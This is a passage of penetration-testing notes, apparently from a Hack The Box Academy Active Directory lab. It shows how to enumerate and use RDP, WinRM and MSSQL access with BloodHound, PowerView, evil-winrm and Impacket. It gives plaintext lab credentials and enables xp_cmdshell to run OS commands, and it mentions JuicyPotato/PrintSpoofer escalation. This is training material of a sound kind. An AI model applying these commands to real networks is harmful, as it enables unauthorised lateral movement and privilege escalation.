H1HTB

Privileged Access

Enumerating RDP Access

Using BloodHound

  • Query: Use the CanRDP edge or run pre-built queries like "Find Workstations where Domain Users can RDP."

  • Output: Graph shows DOMAIN USERS@INLANEFREIGHT.LOCAL with CanRDP to ACADEMY-EA-MS01.INLANEFREIGHT.LOCAL.

  • Node Info: For WLEY@INLANEFREIGHT.LOCAL, check "Execution Rights" to confirm group-delegated RDP privileges.

Using PowerView

C:\mrci0x1> Get-NetLocalGroupMember -ComputerName ACADEMY-EA-MS01 -GroupName "Remote Desktop Users"
ComputerName : ACADEMY-EA-MS01
GroupName    : Remote Desktop Users
MemberName   : INLANEFREIGHT\Domain Users
SID          : S-1-5-21-3842939050-3880317879-2865463114-513
IsGroup      : True
IsDomain     : UNKNOWN

Insight: All Domain Users can RDP to ACADEMY-EA-MS01, increasing the risk of sensitive data exposure.

Accessing a Host via RDP

From Windows

C:\mrci0x1> mstsc.exe /v:ACADEMY-EA-MS01

  • Enter credentials for INLANEFREIGHT\wley (e.g., transporter@4).

From Linux

C:\mrci0x1> xfreerdp /u:wley /p:transporter@4 /v:172.16.5.25

Why Use RDP?: Provides GUI access for reconnaissance, privilege escalation, or data collection.

Enumerating WinRM Access

Using BloodHound

Custom Cypher Query:

MATCH p1=shortestPath((u1:User)-[r1:MemberOf*1..]->(g1:Group)) MATCH p2=(u1)-[:CanPSRemote*1..]->(c:Computer) RETURN p2

Output: Graph shows FOREND@INLANEFREIGHT.LOCAL with CanPSRemote to ACADEMY-EA-MS01.

Using PowerView

C:\mrci0x1> Get-NetLocalGroupMember -ComputerName ACADEMY-EA-MS01 -GroupName "Remote Management Users"
ComputerName : ACADEMY-EA-MS01
GroupName    : Remote Management Users
MemberName   : INLANEFREIGHT\forend
SID          : S-1-5-21-3842939050-3880317879-2865463114-5614
IsGroup      : False
IsDomain     : UNKNOWN

Accessing a Host via WinRM

From Windows

C:\mrci0x1> $password = ConvertTo-SecureString "Klmcargo2" -AsPlainText -Force
C:\mrci0x1> $cred = New-Object System.Management.Automation.PSCredential ("INLANEFREIGHT\forend", $password)
C:\mrci0x1> Enter-PSSession -ComputerName ACADEMY-EA-MS01 -Credential $cred
[ACADEMY-EA-MS01]: PS C:\Users\forend\Documents> hostname
ACADEMY-EA-MS01
[ACADEMY-EA-MS01]: PS C:\Users\forend\Documents> Exit-PSSession

From Linux

C:\mrci0x1> gem install evil-winrm
C:\mrci0x1> evil-winrm -i 172.16.5.25 -u forend -p Klmcargo2

Enumerating MSSQL Access

Using BloodHound

Custom Cypher Query:

MATCH p1=shortestPath((u1:User)-[r1:MemberOf*1..]->(g1:Group)) MATCH p2=(u1)-[:SQLAdmin*1..]->(c:Computer) RETURN p2

Output: Graph shows DAMUNDSEN@INLANEFREIGHT.LOCAL with SQLAdmin on ACADEMY-EA-DB01.

Using PowerUpSQL

C:\mrci0x1> cd .\PowerUpSQL\
C:\mrci0x1> Import-Module .\PowerUpSQL.ps1
C:\mrci0x1> Get-SQLInstanceDomain
ComputerName     : ACADEMY-EA-DB01.INLANEFREIGHT.LOCAL
Instance         : ACADEMY-EA-DB01.INLANEFREIGHT.LOCAL,1433
DomainAccountSid : 1500000521000170152142291832437223174127203170152400
DomainAccount    : damundsen
DomainAccountCn  : Dana Amundsen
Service          : MSSQLSvc
Spn              : MSSQLSvc/ACADEMY-EA-DB01.INLANEFREIGHT.LOCAL:1433
LastLogon        : 4/6/2022 11:59 AM

Accessing MSSQL Server

From Windows

C:\mrci0x1> Get-SQLQuery -Verbose -Instance "172.16.5.150,1433" -username "inlanefreight\damundsen" -password "SQL1234!" -query 'Select @@version'
VERBOSE: 172.16.5.150,1433 : Connection Success.

Column1
-------
Microsoft SQL Server 2017 (RTM) - 14.0.1000.169 (X64) ...

From Linux

C:\mrci0x1> mssqlclient.py INLANEFREIGHT/DAMUNDSEN@172.16.5.150 -windows-auth
Impacket v0.9.25.dev1+20220311.121550.1271d369 - Copyright 2021 SecureAuth Corporation

Password:
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(ACADEMY-EA-DB01\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(ACADEMY-EA-DB01\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 3232) 
[!] Press help for extra shell commands

Enable xp_cmdshell:

SQL> enable_xp_cmdshell
[*] INFO(ACADEMY-EA-DB01\SQLEXPRESS): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
[*] INFO(ACADEMY-EA-DB01\SQLEXPRESS): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.

Execute OS Command:

SQL> xp_cmdshell whoami /priv 
NULL                                                                               

PRIVILEGES INFORMATION                                                             

----------------------                                                             

NULL                                                                               

Privilege Name                Description                               State      

============================= ========================================= ========   
   

SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled    

SeManageVolumePrivilege       Perform volume maintenance tasks          Enabled    

SeImpersonatePrivilege        Impersonate a client after authentication Enabled    

SeCreateGlobalPrivilege       Create global objects                     Enabled    

SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

Note: SeImpersonatePrivilege can be exploited with tools like JuicyPotato or PrintSpoofer for SYSTEM-level escalation.

PreviousACL AbuseNextKerberos Attack Methods with Double Hop Workarounds

Last updated